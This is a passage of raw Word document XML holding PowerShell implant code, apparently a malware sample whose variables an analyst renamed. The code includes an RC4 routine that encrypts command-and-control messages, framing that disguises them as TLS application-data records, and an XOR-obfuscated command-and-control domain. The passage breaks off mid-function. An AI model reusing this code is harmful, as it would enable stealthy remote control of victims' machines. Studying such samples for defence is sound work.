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239C9" w14:textId="07A1E5DE" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">               $</w:t>
      </w:r>
      <w:r>
        <w:t>VAR1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0xf1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8FBD11" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                  0x6e,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77552856" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">    0xcd,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9727E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve"> 0xc6,0x79,0x4c,0x66,0xd1,0x02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A9FA01" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          0xf8,0x33,0xc4,0x86,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8D4F9" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 0xe7,0xa4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F41C7" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                      0x35,0x8d,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB49BC" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">  0x69,0xbd,0xd2,0x1d,0x50,0xf5,0xfb,0xdf,0xec,0xaf,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD86DFD" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     0x0b,0x9e,0x53,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560061B2" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">    0xa4,0xd3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B0BAE2" w14:textId="30EA0E53" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Func1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE6C69" w14:textId="41E9AB50" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     param([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]]$</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]$</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891B8BC" w14:textId="2C679456" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                    $</w:t>
      </w:r>
      <w:r>
        <w:t>SOME_STR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2968CDCE" w14:textId="79DDC58A" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foreach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ($</w:t>
      </w:r>
      <w:r w:rsidR="00216FFD">
        <w:t xml:space="preserve">STEP </w:t>
      </w:r>
      <w:r>
        <w:t>in $</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC2995" w14:textId="7135B787" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        $</w:t>
      </w:r>
      <w:r>
        <w:t>SOME_STR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> += [char]($</w:t>
      </w:r>
      <w:r w:rsidR="00216FFD">
        <w:t xml:space="preserve">STEP </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bxor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4197C" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">           }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D129A84" w14:textId="38504961" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                         return $</w:t>
      </w:r>
      <w:r>
        <w:t>SOME_STR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE8615" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A9C15" w14:textId="3AA1C237" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Func2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2C445" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77206175" w14:textId="12437B35" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                         [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]]$</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_KEY</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047AFE7" w14:textId="0B940118" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]]$</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_STRING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4934080F" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C260ACD" w14:textId="08BF9474" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A795522" w14:textId="1D70A738" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3BA2A" w14:textId="43757BBB" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">           for ($</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0; $</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 256; $</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9BBAB" w14:textId="71381D42" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                           $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = ($</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>] + $</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_KEY</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> % $</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_KEY</w:t>
      </w:r>
      <w:r>
        <w:t>.Length]) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3163DE" w14:textId="01E645F1" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                             $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>], $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t>] = $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t>], $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0FFD4" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F37375" w14:textId="59B13BD0" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                     $</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A12AB0" w14:textId="31C6F829" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                    $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFA44F" w14:textId="5D6BA87E" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        $</w:t>
      </w:r>
      <w:r w:rsidR="00233C43">
        <w:t>FIRST_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F6D01" w14:textId="770747CA" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>foreach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ($</w:t>
      </w:r>
      <w:r w:rsidR="001F4CE7">
        <w:t>BYTE_IN_COMMAND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in $</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_STRING</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03856E0C" w14:textId="617CF06E" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                             $</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = ($</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + 1) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB7C0E" w14:textId="7736F9D7" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                              $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = ($</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>]) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F32F9AD" w14:textId="6C8F59F3" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                            $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>], $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t>] = $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t>], $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A164D3" w14:textId="7F193D27" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        $</w:t>
      </w:r>
      <w:r w:rsidR="008062AE">
        <w:t>KEY_FROM_RANGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[($</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="003C62D2">
        <w:t>COUNTER</w:t>
      </w:r>
      <w:r>
        <w:t>] + $</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>[$</w:t>
      </w:r>
      <w:r w:rsidR="00872E55">
        <w:t>ZERO</w:t>
      </w:r>
      <w:r>
        <w:t>]) % 256]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5B99B" w14:textId="340A12EE" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                       $</w:t>
      </w:r>
      <w:r w:rsidR="00233C43">
        <w:t>FIRST_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> += ($</w:t>
      </w:r>
      <w:r w:rsidR="001F4CE7">
        <w:t>BYTE_IN_COMMAND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -bxor $</w:t>
      </w:r>
      <w:r w:rsidR="008062AE">
        <w:t>KEY_FROM_RANGE</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE7009" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACE582" w14:textId="68D7375C" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">             return ,$</w:t>
      </w:r>
      <w:r w:rsidR="00233C43">
        <w:t>FIRST_ARRAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED76B4" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFC65B" w14:textId="6C9E9E44" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D77B5">
        <w:t>Func3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219991A3" w14:textId="21903CC1" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                  param ([string]$</w:t>
      </w:r>
      <w:r w:rsidR="00DA5718">
        <w:t>C2_COMMAND</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74E85E" w14:textId="465DD85D" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">              $</w:t>
      </w:r>
      <w:r w:rsidR="002D384F">
        <w:t>UTF-8_ENCODED_STR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>UTF8.GetBytes($</w:t>
      </w:r>
      <w:r w:rsidR="00DA5718">
        <w:t>C2_COMMAND</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0322EE" w14:textId="7562927B" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                   $</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:r>
        <w:t>Func2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r>
        <w:t>VAR1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_STRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidR="002D384F">
        <w:t>UTF-8_ENCODED_STR</w:t>
      </w:r>
      <w:r>
        <w:t>) + (0x02,0x04,0x06,0x08)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665FFAEC" w14:textId="288052E9" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                     $</w:t>
      </w:r>
      <w:r w:rsidR="002D384F">
        <w:t>REVERSED_BYTES_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>GetBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([int16]$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t>.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A1052" w14:textId="3E52403C" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">        [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="002D384F">
        <w:t>REVERSED_BYTES_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0D26F" w14:textId="5778716A" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">       return (0x17, 0x03, 0x03) + $</w:t>
      </w:r>
      <w:r w:rsidR="002D384F">
        <w:t>REVERSED_BYTES_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + $</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B55D273" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567775B8" w14:textId="0045B903" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D77B5">
        <w:t>Func4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBFC12" w14:textId="1C71AA4F" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 $</w:t>
      </w:r>
      <w:r w:rsidR="005C3024">
        <w:t>XORED_222_STR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:r>
        <w:t>Func1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @(168,187,172,183,184,167,240,186,171,169,176,177,176,186,187,172,240,189,177,179) -</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 222)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B320B6A" w14:textId="0F0FF5AE" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          $</w:t>
      </w:r>
      <w:r w:rsidR="00595DE7">
        <w:t>DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
